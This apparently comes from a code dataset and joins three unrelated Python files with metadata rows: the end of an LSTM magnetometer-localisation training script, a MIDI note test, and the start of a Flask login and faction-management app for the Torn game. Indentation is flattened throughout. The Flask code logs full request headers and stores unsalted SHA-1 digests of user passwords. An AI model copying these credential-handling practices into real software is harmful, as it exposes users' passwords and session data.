train_Mag_x=train_data['GeoX']
train_Mag_x=np.array(train_Mag_x).astype(float).reshape(-1,1)
scaler_mag_x=MinMaxScaler()
Mag_x=scaler_mag_x.fit_transform(train_Mag_x)
train_Mag_y=train_data['GeoY']
train_Mag_y=np.array(train_Mag_y).astype(float).reshape(-1,1)
scaler_mag_y=MinMaxScaler()
Mag_y=scaler_mag_y.fit_transform(train_Mag_y)
train_Mag_z=train_data['GeoZ']
train_Mag_z=np.array(train_Mag_z).astype(float).reshape(-1,1)
scaler_mag_z=MinMaxScaler()
Mag_z=scaler_mag_z.fit_transform(train_Mag_z)
train_size=int(len(train_loc_x))
#val_set 设置
val_raw_x=val_data['Loc_x']
val_raw_x=np.array(val_raw_x).astype(float).reshape(-1,1)
v_scaler_loc_x=MinMaxScaler()
val_loc_x=v_scaler_loc_x.fit_transform(val_raw_x)
val_raw_y=val_data['Loc_y']
val_raw_y=np.array(val_raw_y).astype(float).reshape(-1,1)
v_scaler_loc_y=MinMaxScaler()
val_loc_y=v_scaler_loc_y.fit_transform(val_raw_y)
val_Mag_x=val_data['GeoX']
val_Mag_x=np.array(val_Mag_x).astype(float).reshape(-1,1)
v_scaler_mag_x=MinMaxScaler()
val_Mag_x=v_scaler_mag_x.fit_transform(val_Mag_x)
val_Mag_y=val_data['GeoY']
val_Mag_y=np.array(val_Mag_y).astype(float).reshape(-1,1)
v_scaler_mag_y=MinMaxScaler()
val_Mag_y=v_scaler_mag_y.fit_transform(val_Mag_y)
val_Mag_z=val_data['GeoZ']
val_Mag_z=np.array(val_Mag_z).astype(float).reshape(-1,1)
v_scaler_mag_z=MinMaxScaler()
val_Mag_z=v_scaler_mag_z.fit_transform(val_Mag_z)
val_size=int(len(val_loc_x))
train_mag_x = create_dataset_input(train_Mag_x, look_back = look_back)
train_mag_y = create_dataset_input(train_Mag_y, look_back = look_back)
train_mag_z = create_dataset_input(train_Mag_z, look_back = look_back)
test_mag_x = create_dataset_input(val_Mag_x, look_back = look_back)
test_mag_y = create_dataset_input(val_Mag_y, look_back = look_back)
test_mag_z = create_dataset_input(val_Mag_z, look_back = look_back)
#print('trian_mag_x:',train_mag_x)
train_loc_x = create_dataset_input(train_loc_x, look_back = look_back)
train_loc_y = create_dataset_input(train_loc_y, look_back = look_back)
test_loc_x = create_dataset_input(val_loc_x, look_back = look_back)
test_loc_y = create_dataset_input(val_loc_y, look_back = look_back)
trainX = np.concatenate((train_mag_x,train_mag_y,train_mag_z),axis = 2)
testX = np.concatenate((test_mag_x,test_mag_y,test_mag_z),axis = 2)
#print('train_loc_x.shape:',train_loc_x.shape)
trainY = np.concatenate((train_loc_x,train_loc_y),axis = 2)
testY = np.concatenate((test_loc_x,test_loc_y),axis = 2)
trainY = np.reshape(trainY, (len(trainY),look_back,2))
#print('trianY:',trainY.shape)
lengthTrain = len(trainX)
lengthTest = len(testX)
while(lengthTrain % batch_size != 0):
lengthTrain -= 1
while(lengthTest % batch_size != 0):
lengthTest -= 1
return trainX[0:lengthTrain],trainY[0:lengthTrain],testX[0:lengthTest],testY[0:lengthTest]
def model_train(train_x, train_y, test_x, test_y,file_structure,file_acc2loss):
model=model_build()
for i in range(epochs):
history = model.fit(train_x, train_y, batch_size=batch_size, epochs = 1, verbose=1,shuffle = False) #validation_split=0.1, validation_data=(test_x, test_y)
# # need to reset state for every epoch
model.reset_states()
# #print('hidden_state:',hidden_state)
# # list all data in history
# '''
# print('history.keys()',hist.history.keys())
# # summarize history for accuracy
# plt.plot(hist.history['acc'])
# plt.plot(hist.history['val_acc'])
# plt.title('model accuracy')
# plt.ylabel('accuracy')
# plt.xlabel('epoch')
# plt.legend(['train', 'test'], loc='upper left')
# plt.show()
# '''
print('Real Epoches:',i+1)
with open(file_acc2loss,'a', newline='') as csvfile:
if not os.path.getsize(file_acc2loss): #file is empty
spamwriter = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_NONE)
spamwriter.writerow(['epochs','loss','acc'])#, 'val_loss','val_acc'
data = ([
i,history.history['loss'][0],history.history['acc'][0]#, history.history['val_loss'][0], history.history['val_acc'][0]
])
spamwriter = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_NONE)
spamwriter.writerow(data)
return model
def model_build(hidden_nodes=hidden_nodes,batch_size=batch_size , time_steps = look_back, feature_size = 3):
inputs1 = Input(batch_shape = (batch_size,look_back,feature_size))
lstm1 = LSTM(hidden_nodes, stateful = True, return_sequences=True, return_state=True,dropout=0.2)(inputs1)
lstm1 = LSTM(hidden_nodes,return_sequences=True,dropout=0.2)(lstm1)
lstm1 = TimeDistributed(Dense((2)))(lstm1)
model = Model(input = inputs1, outputs = lstm1)
print(model.layers)
model.compile(loss='mean_squared_error', optimizer=adam,metrics=['acc'])
model.summary()
return model
if __name__=='__main__':
input_mode=[]
change=False
if change:
input_mode=input('Please inport train and val mode in _-_(e.g:a-b)\n')
if input_mode=='all' :
input_mode=['a-a','a-b','a-ab','b-a','b-b','b-ab','ab-a','ab-b','ab-ab']
else:
input_mode=['a-b']
for t_v in input_mode:
mode=mode_decide(t_v)
file_structure = [mode['train_set']+'-'+mode['val_set']+'_'+'model_ts=30_256_5_100.png']
file_acc2loss = [mode['train_set']+'-'+mode['val_set']+'_'+'log_ts=30_256_5_100.csv']
file_structure="".join(file_structure)
file_acc2loss = "".join(file_acc2loss)
train_data,val_data=load_data(mode)
train_x, train_y, test_x, test_y=data_prepocess(train_data,val_data)
model=model_train(train_x, train_y, test_x, test_y,file_structure,file_acc2loss)
del model
| MeichenBu/2018-2019-SURF | CNN+LSTM/LSTM_old.py | LSTM_old.py | py | 7,596 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "keras.optimizers.Adam",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
... |
4724184190 | import sys
sys.path.append('/usr/local/lib/python3.7/site-packages')
import mido
import time
outport = mido.open_output('VirtualDevice Bus 1')
note_sequence = [57, 59, 60, 62, 57, 59, 55, 57]
for note in note_sequence:
time.sleep(0.25)
outport.send(mido.Message('note_on', note=note, velocity = 100))
time.sleep(0.25)
outport.send(mido.Message('note_off', note=note, velocity = 100))
| krispenney/midi | test.py | test.py | py | 404 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 2,
"usage_type": "attribute"
},
{
"api_name": "mido.open_output",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_nu... |
14640804692 | import logging
import logging.handlers
from flask import Flask, render_template, redirect, request
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager, UserMixin, login_user, login_required, logout_user, current_user
from forms import LoginForm, PaymentForm, PasswordForm, OccalcForm, ApikeyForm, DeleteForm, RegisterForm, OCpolicyForm, LeaderForm, EnemyForm, TimeForm, DeleteEnemyForm, AddEnemyForm
import base64
import datetime
import hashlib
import hmac
import json
import pandas as pd
import re
import sqlite3
import time
import read_sqlite
import dehtml
import random
import password
import challenge
re.numeric = re.compile('^[0-9]+$')
token = re.compile('^([-\d]+)([a-z]+)(\d+)-([0-9a-f]+)$') # used for graphs
combat_token = re.compile('^([-\d]+)-([-\d]+)([a-z]+)(\d+)-([0-9a-f]+)$') # used for combat events
bonus_token = re.compile('^([-\d]+)-([-\d]+)bonus(\d+)-([0-9a-f]+)$') # used for chain bonus record
armory_token = re.compile('^([-\d]+)-(\d+)-([0-9a-f]+)$')
enemy_token = re.compile('^([-\d]+)-(\d+)-(\d+)-([0-9a-f]+)$')
target_token = re.compile('^([-\d]+)-(\d+)-(\d+)-(\d+)-([0-9a-f]+)$')
time_interval = re.compile('^(\d+)-(\d+)$')
# f_id, crimetype, timestamp, (either number or 'history'), hmac
oc_history_picker = re.compile('^([-\d]+)-([0-9])-([0-9]+)-([0-9a-z]+)-([0-9a-f]+)$')
chain_token = re.compile('^(\d+)-chain-(\d+)-(\d+)-([0-9a-f]+)$')
chain_token_o = re.compile('^(\d+)-scoreboard-(\d+)-(\d+)-([0-9a-f]+)-([a-z]+)$') # with ordering parameter
now = int(time.time())
# Now there is just one way to read this.
rodb = read_sqlite.Rodb()
hmac_key = rodb.getkey()
rodb = None
app = Flask(__name__)
app.config.from_pyfile('config.py')
loghandler = logging.handlers.RotatingFileHandler('/home/peabrain/logs/tu0036.log', maxBytes=1024 * 1024, backupCount=10)
loghandler.setLevel(logging.INFO)
app.logger.setLevel(logging.INFO)
app.logger.addHandler(loghandler)
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.init_app(app)
class LUser(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(30), unique=True) # torn numeric id
login_allowed = db.Column(db.Integer) # int used as bool
must_change_pw = db.Column(db.Integer) # int used as bool
pwhash = db.Column(db.String(255)) # a hash
registered = db.Column(db.Integer) # et account created
confirmed = db.Column(db.Integer) # et confirmed, or 0 if not confirmed
last_login = db.Column(db.Integer) # et
failed_logins = db.Column(db.Integer) # reset to 0 on success
pw_ver = db.Column(db.Integer) # 1=sha1, 2=bcrypt
#
# see is_authenticated() is_anonymous() get_id()
class Payment_cache(db.Model):
id = db.Column(db.Integer, primary_key=True)
faction_id = db.Column(db.Integer)
oc_plan_id = db.Column(db.Integer)
timestamp = db.Column(db.Integer)
paid_by = db.Column(db.Integer)
class Report_number_oc(db.Model):
id = db.Column(db.Integer, primary_key=True)
timestamp = db.Column(db.Integer)
pid = db.Column(db.Integer)
number_oc = db.Column(db.Integer)
class Banned_pw(db.Model):
id = db.Column(db.Integer, primary_key=True)
sha = db.Column(db.String(40)) # sha1 of a prohibited pw
class Apikey_history(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(30))
et_web_update = db.Column(db.Integer)
deleted = db.Column(db.Integer)
class Ocpolicy(db.Model):
id = db.Column(db.Integer, primary_key=True)
faction = db.Column(db.Integer)
timestamp = db.Column(db.Integer)
percent = db.Column(db.Numeric(6,2))
username = db.Column(db.String(30))
octype = db.Column(db.Integer)
class Extra_leaders(db.Model):
id = db.Column(db.Integer, primary_key=True)
et = db.Column(db.Integer)
faction_id = db.Column(db.Integer)
player_id = db.Column(db.Integer)
is_leader = db.Column(db.Integer)
set_by = db.Column(db.Integer)
class Challenge(db.Model):
id = db.Column(db.Integer, primary_key=True)
et = db.Column(db.Integer)
expires = db.Column(db.Integer)
used = db.Column(db.Integer)
username = db.Column(db.String(30), unique=True) # torn numeric id
action = db.Column(db.String(20))
data = db.Column(db.String(60))
pw_ver = db.Column(db.Integer)
pw_ver = db.Column(db.Integer)
chal_type = db.Column(db.String(10))
expect = db.Column(db.String(40))
class Response(db.Model):
id = db.Column(db.Integer, primary_key=True)
et = db.Column(db.Integer)
used = db.Column(db.Integer)
username = db.Column(db.String(30), unique=True) # torn numeric id
chal_type = db.Column(db.String(10))
provided = db.Column(db.String(40))
class Enemy(db.Model):
id = db.Column(db.Integer, primary_key=True)
tornid = db.Column(db.String(30)) # torn numeric id
username = db.Column(db.String(30))
f_id = db.Column(db.Integer)
class Timerange(db.Model):
id = db.Column(db.Integer, primary_key=True)
tstart = db.Column(db.Integer)
tend = db.Column(db.Integer)
f_id = db.Column(db.Integer)
class Chains(db.Model):
pg_chain_id = db.Column(db.Integer, primary_key=True)
f_id = db.Column(db.Integer)
et = db.Column(db.Integer)
chain_len = db.Column(db.Integer)
tstart = db.Column(db.Integer)
tend = db.Column(db.Integer)
torn_chain_id = db.Column(db.Integer)
respect = db.Column(db.String(16))
class Chain_player_sum(db.Model):
pk = db.Column(db.Integer, primary_key=True)
pg_chain_id = db.Column(db.Integer)
player_id = db.Column(db.Integer)
actions = db.Column(db.Integer)
attacked = db.Column(db.Integer)
hospitalized = db.Column(db.Integer)
mugged = db.Column(db.Integer)
respect = db.Column(db.Integer)
att_stale = db.Column(db.Integer)
lost = db.Column(db.Integer)
att_escape = db.Column(db.Integer)
def_stale = db.Column(db.Integer)
defend = db.Column(db.Integer)
def_escape = db.Column(db.Integer)
class Chain_members(db.Model):
mempk = db.Column(db.Integer, primary_key=True)
pg_chain_id = db.Column(db.Integer)
player_id = db.Column(db.Integer)
player_name = db.Column(db.String(16))
class Bonus_events(db.Model):
bonus_pk_id = db.Column(db.Integer, primary_key=True)
pg_chain_id = db.Column(db.Integer)
et = db.Column(db.Integer)
att_name = db.Column(db.String(16))
att_id = db.Column(db.Integer)
verb = db.Column(db.String(16))
def_name = db.Column(db.String(16))
def_id = db.Column(db.Integer)
outcome = db.Column(db.String(20))
num_respect = db.Column(db.Numeric(12,4))
@login_manager.user_loader
def load_user(user_id):
return LUser.query.get(int(user_id)) # returns whole object
# this logs someone out
@app.route('/logout')
def logout():
logout_user()
return redirect('/')
#=================================================================================
def obtain_leaders_for_faction(pid, fid):
# extra leaders from ORM
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(pid)
extra = {faction_sum['leader']: [1, 1, faction_sum['leadername'], 'Torn', 'mists of time'], faction_sum['coleader']: [1, 1, faction_sum['coleadername'], 'Torn', 'mists of time']}
leader_orm = {}
extras = Extra_leaders.query.filter_by(faction_id = fid).all()
for leader in extras:
pid = leader.player_id
if (not pid in leader_orm) or (leader.et > leader_orm[pid][1]):
leader_orm[leader.player_id] = [leader.is_leader, leader.et, rodb.pid2n[str(pid)], rodb.pid2n[str(leader.set_by)], time.strftime("%Y-%m-%d %H:%M",time.gmtime(leader.et))]
# only the players with a 1 for is_leader from their latest record in ORM and the two recignised by Torn
for kl in leader_orm.keys():
if leader_orm[kl][0]: extra[kl] = leader_orm[kl]
return extra
#=================================================================================
def bool_leader(pid, fid):
leaders = obtain_leaders_for_faction(pid, fid)
return pid in leaders
#=================================================================================
@app.route('/', methods = ['GET','POST'])
@app.route('/login', methods = ['GET','POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
try:
u = request.form['username']
p = request.form['password']
reject = True # assume rejection
allowed_login = False
except:
app.logger.info('error reading from login form')
return render_template('login.html', title='Sign In', form=form)
wantuser = LUser.query.filter_by(username = u).first()
if not wantuser:
# unknown username
if not re.numeric.match(u):
u = 'bad username (must be all numeric)'
return render_template('bad_login.html', title='bad login attempt', u=u)
try:
lastt = wantuser.last_login
nfail = wantuser.failed_logins
hash_version = wantuser.pw_ver
except:
return "failed somehow"
return render_template('login.html', title='Sign In', form=form)
if wantuser.login_allowed and password.checkpw(hash_version, p, wantuser.pwhash):
reject = False
if not reject:
wantuser.last_login = int(time.time())
wantuser.failed_logins = 0
login_user(wantuser)
db.session.commit()
if lastt:
lastt = datetime.datetime.fromtimestamp(lastt)
else:
lastt = 'never'
app.logger.info('%s logged in successfully', u)
for rh in request.headers:
app.logger.info('%s had request header %s', u, rh)
return render_template('good_login.html', title='successful login', u=u, nfail=nfail, lastt=lastt, must_change_pw=wantuser.must_change_pw)
wantuser.failed_logins += 1
db.session.commit()
return render_template('bad_login.html', title='bad login attempt', u=u)
# show form before submission
return render_template('login.html', title='Sign In', form=form)
#=================================================================================
# This is for testing flask without the web server.
@app.route("/rhubarb/<anything_here>", methods=['GET'])
def no_rhubarb(anything_here):
return redirect('/' + anything_here)
#=================================================================================
@app.route('/register', methods = ['GET','POST'])
def register():
form = RegisterForm()
u = 'default-u'
p = 'default-p'
c = 'default-c'
if form.validate_on_submit():
try:
u = request.form['username']
p = request.form['password']
c = request.form['checkbox']
except:
return render_template('register.html', title='Register', form=form, retry=True)
# is username numeric?
if not re.numeric.match(u):
return render_template('accounts_explained.html', title='Accounts Explained')
# does user already exist?
wantuser = LUser.query.filter_by(username = u).first()
if wantuser:
return render_template('message.html', message='That username is already in use. If already registered and confirmed use login. Or wait for a past registration attempt to expire and retry.', logged_in=False)
# is pw acceptable?
if not test_strength(p):
return render_template('message.html', message='That password is not allowed - too obvious.', logged_in=False)
# is cookie consent on?
if c != 'yes':
return render_template('message.html', title='Message', message='Consent to a cookie (for a logged-in session) is required.', logged_in=False)
pw_ver, pwhash = password.pwhash(0, p)
et = int(time.time())
newu = LUser (username=str(u), login_allowed=0, must_change_pw=0, pw_ver=pw_ver, pwhash=pwhash, registered=et, confirmed=0, last_login=0, failed_logins=0)
db.session.add(newu)
db.session.commit()
# set challenge to be done before confirmed is set
new_random_challenge = challenge.Challenge()
expected = 'NEWUSER:' + new_random_challenge.get_rfc1760_challenge()
newc = Challenge(et=et, expires=et+900, used=0, username=u, action='newuser', data='', chal_type='message', expect=expected, pw_ver=pw_ver)
db.session.add(newc)
db.session.commit()
return render_template('challenge.html', title='In-game challenge', challenge=expected)
return render_template('register.html', title='Register', form=form, retrry=False)
#=================================================================================
# This is not the same as "settings" change when pw is known.
@app.route("/rhubarb/unknown_pw_reset", methods=['GET','POST'])
@app.route("/unknown_pw_reset", methods=['GET','POST'])
def unknown_pw_reset():
form = LoginForm() # requests username and password
# - - - - - - - POST section
if request.method == 'POST':
u = None
p = None
if form.validate_on_submit():
try:
u = request.form['username']
p = request.form['password']
# another job either uses or discards the data provided here
except:
app.logger.info('error reading from login form for pw reset')
return redirect('/rhubarb/unknown_pw_reset')
else:
app.logger.info('change_pw form fails validation')
return redirect('/rhubarb/unknown_pw_reset')
if not test_strength(p):
return render_template('message.html', message='That password is not allowed - too obvious.', logged_in=False)
ban_digest = hashlib.sha1(bytes(p, 'utf-8')).hexdigest()
ban = Banned_pw(sha = ban_digest)
db.session.add(ban)
db.session.commit()
# rate limit - not too many of these allowed at once
rate_discovery = Challenge.query.filter_by(username = u).all()
if len(rate_discovery) > 10:
return render_template('message.html', message='Too many reset attempts - need to wait.', logged_in=False)
# set challenge to be done before applied to l_user table
new_random_challenge = challenge.Challenge()
expected = 'PWRESET:' + new_random_challenge.get_rfc1760_challenge()
et = int(time.time())
pw_ver, pwhash = password.pwhash(0, p)
newc = Challenge(et=et, expires=et+900, used=0, username=u, action='pwreset', data=pwhash, pw_ver=pw_ver, chal_type='message', expect=expected)
db.session.add(newc)
db.session.commit()
return render_template('challenge.html', title='In-game challenge', challenge=expected)
# - - - - - - - POST section
return render_template('pw_reset.html', form=form)
#=================================================================================
@app.route("/settings", methods=['GET'])
@login_required
def settings():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
u = current_user.username
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
name = player['name']
# check whether API key has worked recently for player
# XXX and faction
# et_pstats, et_set, short_err, long_err
got_key = [0,0]
ak_stats = list(rodb.has_api_key(u)) # simple numeric values
if ak_stats[0]:
got_key[0] = 1
# compare to ORM
not_obsolete = 1 # assume sqlite is current then check whether there is a more recent psql
wantevent = Apikey_history.query.filter_by(username = u).first()
if wantevent:
if wantevent.et_web_update > ak_stats[1]:
not_obsolete = 0 # psql more recent
if wantevent.deleted:
got_key[0] = 0
# massage for human readability
if ak_stats[0] and ak_stats[3]:
if ak_stats[3] < ak_stats[0]:
# error has been fixed
ak_stats[3] = 0
else:
# problem been seen
got_key[1] = 1
if ak_stats[2] < ak_stats[0]:
# error has been fixed
ak_stats[2] = 0
else:
# problem been seen
got_key[1] = 1
ak_stats[0] = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ak_stats[0]))
ak_stats[1] = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ak_stats[1]))
oc_calc_sr = 0
want_oc = Report_number_oc.query.filter_by(pid = u).all()
for i in want_oc:
if player['oc_calc'] != i.number_oc:
oc_calc_sr = i.number_oc # self-reported number
return render_template('settings.html', title='Tornutopia Settings', u=u, name=name, player=player, oc_calc_sr=oc_calc_sr, got_key=got_key, ak_stats=ak_stats, not_obsolete=not_obsolete)
#=================================================================================
@app.route("/change_pw", methods=['GET','POST'])
@login_required
def change_pw():
u = current_user.username
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
name = player['name']
form = PasswordForm()
# - - - - - - - POST section
if request.method == 'POST':
old_pw = None
new_pw = None
if form.validate_on_submit():
try:
old_pw = request.form['old_password']
new_pw = request.form['new_password']
except:
app.logger.info('error reading from change_pw form')
return redirect('/rhubarb/change_pw')
else:
app.logger.info('change_pw form fails validation')
return redirect('/rhubarb/change_pw')
# is old pw correct?
wantuser = LUser.query.filter_by(username = u).first()
if not wantuser:
# should never happen - has this user been deleted while logged in?
return redirect('/rhubarb/logout')
if not password.checkpw(wantuser.pw_ver, old_pw, wantuser.pwhash):
return render_template('message.html', message='old password incorrect', logged_in=True)
# is new pw acceptable?
if not test_strength(new_pw):
return render_template('message.html', message='That password is not allowed - too obvious.', logged_in=True)
# set new pwhash for u and show success
v,h = password.pwhash(0, new_pw)
if not v or not h:
return render_template('message.html', message='failure to handle new password', logged_in=True)
# set new password and add to banned list
wantuser.pw_ver = v
wantuser.pwhash = h
wantuser.must_change_pw = 0
db.session.commit()
ban_digest = hashlib.sha1(bytes(new_pw, 'utf-8')).hexdigest()
ban = Banned_pw(sha = ban_digest)
db.session.add(ban)
db.session.commit()
return render_template('message.html', message='password changed', logged_in=True)
# - - - - - - - POST section
return render_template('set_pw.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route("/set_oc_calc", methods=['GET','POST'])
@login_required
def set_oc_calc():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
u = current_user.username
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
name = player['name']
number_oc = 0
form = OccalcForm()
if request.method == 'POST':
if form.validate_on_submit():
try:
number_oc = request.form['number_oc']
except:
return render_template('message.html', message='Something failed about reading from occalcform.', logged_in=True)
else:
app.logger.info('set_oc_calc form fails validation')
return render_template('message.html', message='Form fails validation.', logged_in=True)
if int(number_oc) > 0:
new_id=int(random.random() * 1000000000)
report_number_oc = Report_number_oc(id=new_id, timestamp=int(time.time()), pid=int(u), number_oc=number_oc)
db.session.add(report_number_oc)
db.session.commit()
return redirect('/rhubarb/settings')
return render_template('set_oc_calc.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route("/delete_api_key", methods=['GET','POST'])
@login_required
def delete_api_key():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
new_fname = '/var/torn/spool/collect/' + str(int(random.random() * 1000000000))
with open(new_fname, 'w') as api_out:
print("DELETE APIKEY\n" + str(current_user.username) + "\nEND", file=api_out)
event = Apikey_history(username=str(current_user.username), et_web_update=int(time.time()), deleted=1)
db.session.add(event)
db.session.commit()
return render_template('message.html', message='accepted command to delete API key', logged_in=True)
#=================================================================================
@app.route("/set_api_key", methods=['GET','POST'])
@login_required
def set_api_key():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
u = current_user.username
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
name = player['name']
form = ApikeyForm()
# - - - - - - - POST section
if request.method == 'POST':
if form.validate_on_submit():
try:
apikey = request.form['apikey']
use_for_faction = request.form['use_for_faction']
except:
return render_template('message.html', message='something failed about reading', logged_in=True)
else:
app.logger.info('error reading from ApikeyForm')
return render_template('message.html', message='ApikeyForm fails validation.', logged_in=True)
new_fname = '/var/torn/spool/collect/' + str(int(random.random() * 1000000000))
with open(new_fname, 'w') as api_out:
print("APIKEY\n" + apikey + '\n' + str(use_for_faction) + "\nEND", file=api_out)
event = Apikey_history(username=str(current_user.username), et_web_update=int(time.time()), deleted=0)
db.session.add(event)
db.session.commit()
return redirect('/rhubarb/settings')
# - - - - - - - POST section
return render_template('set_api_key.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route("/delete_account", methods=['GET','POST'])
@login_required
def delete_account():
u = current_user.username
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
name = player['name']
form = DeleteForm()
# - - - - - - - POST section
if request.method == 'POST':
if form.validate_on_submit():
try:
pw = request.form['password']
except:
return render_template('message.html', title='Delete Failed', message='something failed about reading from deleteform', logged_in=False)
else:
app.logger.info('delete_account form fails validation')
return redirect('/rhubarb/settings')
wantuser = LUser.query.filter_by(username = u).first()
if not wantuser:
return render_template('message.html', title='Delete Failed', message='user to be deleted cannot be found', logged_in=False)
# check password
if not password.checkpw(wantuser.pw_ver, pw, wantuser.pwhash):
return render_template('message.html', title='Delete Failed', message='wrong password', logged_in=True)
db.session.delete(wantuser)
db.session.commit()
return redirect('/rhubarb/logout')
# - - - - - - - POST section
return render_template('delete_account.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route('/faction_ov')
@login_required
def faction_ov():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
big_losses = rodb.recent_big_losses(faction_sum['fid'])
player = rodb.get_player_data(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
friendly_fires = rodb.get_friendly_fire(faction_sum['fid'])
# extra leaders from ORM
extra = obtain_leaders_for_faction(current_user.username, faction_sum['fid'])
return render_template('faction_ov.html', title='Faction Overview', u=current_user.username, player=player, faction_sum=faction_sum,
is_leader=is_leader, friendly_fires=friendly_fires, extra=extra, nrbl=len(big_losses), big_losses=big_losses)
#=================================================================================
@app.route('/leaders', methods=['GET','POST'])
@login_required
def leaders():
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
extra = obtain_leaders_for_faction(current_user.username, faction_sum['fid'])
form = LeaderForm()
#
form.player_demote.choices = [(0, 'no selection')]
for eleader in extra:
form.player_demote.choices.append((eleader, extra[eleader][2]))
#
form.player_promote.choices = [(0, 'no selection')]
for pid in sorted(faction_sum['members']):
# members of this faction, and only if they are not leaders already
if not bool_leader(int(pid), faction_sum['fid']):
form.player_promote.choices.append((pid, rodb.pid2n[pid]))
# - - - - - - - POST section
if request.method == 'POST':
if not is_leader:
return redirect('/rhubarb/logout')
player_demote = None
player_promote = None
#
if form.is_submitted():
try:
player_demote = request.form['player_demote']
except:
pass
try:
player_promote = request.form['player_promote']
except:
pass
else:
return render_template('message.html', title='Change leaders', message='validation of LeaderForm failed', logged_in=True)
# player_demote and player_promote are str and '0' is a valid value meaning no selection.
if not player_demote or not player_promote:
return render_template('message.html', title='Change leaders', message='valid input not detected', logged_in=True)
now = int(time.time())
if player_demote != '0':
dl = Extra_leaders(et=now, faction_id=int(faction_sum['fid']), player_id=int(player_demote), is_leader=0, set_by=int(current_user.username))
db.session.add(dl)
if player_promote != '0':
pl = Extra_leaders(et=now, faction_id=int(faction_sum['fid']), player_id=int(player_promote), is_leader=1, set_by=int(current_user.username))
db.session.add(pl)
db.session.commit()
return redirect('/rhubarb/faction_ov')
# - - - - - - - POST section
return render_template('leaders.html', title='Leader Appointment', faction_sum=faction_sum, is_leader=is_leader, form=form)
#=================================================================================
@app.route('/pay_policy', methods=['GET','POST'])
@login_required
def pay_policy():
rodb = read_sqlite.Rodb()
oc_num2title = rodb.get_oc_titles()
faction_sum = rodb.get_faction_for_player(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
form = OCpolicyForm()
form.cn.choices = [(k, oc_num2title[k]) for k in sorted(oc_num2title.keys())]
# - - - - - - - POST section
if request.method == 'POST':
if not is_leader:
return redirect('/rhubarb/logout')
if form.validate_on_submit():
try:
cn = request.form['cn']
percent = request.form['percent']
except:
app.logger.info('error involving OCpolicyForm')
return render_template('message.html', title='change to pay policy', message='OCpolicyForm exception reading input', logged_in=True)
else:
app.logger.info('OCpolicyForm fails validation')
return render_template('message.html', title='change to pay policy', message='OCpolicyForm failed validation', logged_in=True)
try:
policy_update = Ocpolicy(faction=int(faction_sum['fid']), timestamp=int(time.time()), percent=percent, username=current_user.username, octype=cn)
db.session.add(policy_update)
db.session.commit()
except:
app.logger.info('error inserting ino Ocpolicy ORM')
return render_template('message.html', title='change to pay policy', message='Change of pay policy failed to update DB.', logged_in=True)
return redirect('/rhubarb/pay_policy')
# - - - - - - - POST section
# read policy from sqlite
read_policy = rodb.get_oc_payment_policy(faction_sum['fid'])
policy = {} # mutable to produce human-readable times
for k in sorted(read_policy.keys()):
et = read_policy[k][0]
policy[k] = list(read_policy[k])
policy[k][0] = time.strftime("%Y-%m-%d %H:%M",time.gmtime(et))
if str(read_policy[k][3]) in rodb.pid2n:
policy[k][3] = rodb.pid2n[ str(read_policy[k][3]) ]
# check the orm for a cached alteration to the figures from sqlite
pending = 0
want_policy_change = Ocpolicy.query.filter_by(faction = faction_sum['fid']).all()
for pol_item in want_policy_change:
if pol_item.octype not in policy:
pending=1
break
if float(pol_item.percent) != float(policy[pol_item.octype][2]):
pending=1
break
return render_template('pay_policy.html', title='Pay Policy', u=current_user.username, is_leader=is_leader, policy=policy, oc_num2title=oc_num2title, pending=pending, form=form)
#=================================================================================
@app.route('/faction_player_table')
@login_required
def faction_player_table():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
player = rodb.get_player_data(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
if not is_leader:
return render_template('message.html', title='Faction Player Table Denied', u=current_user.username, player=player, message='No access to player table!', logged_in=True)
pt = rodb.get_player_table(faction_sum) # take advantage of having looked this up already
return render_template('faction_player_table.html', title='Faction Player Table', u=current_user.username, player=player, faction_sum=faction_sum, is_leader=is_leader, pt=pt)
#=================================================================================
@app.route('/home')
@login_required
def home():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
player = rodb.get_player_data(current_user.username)
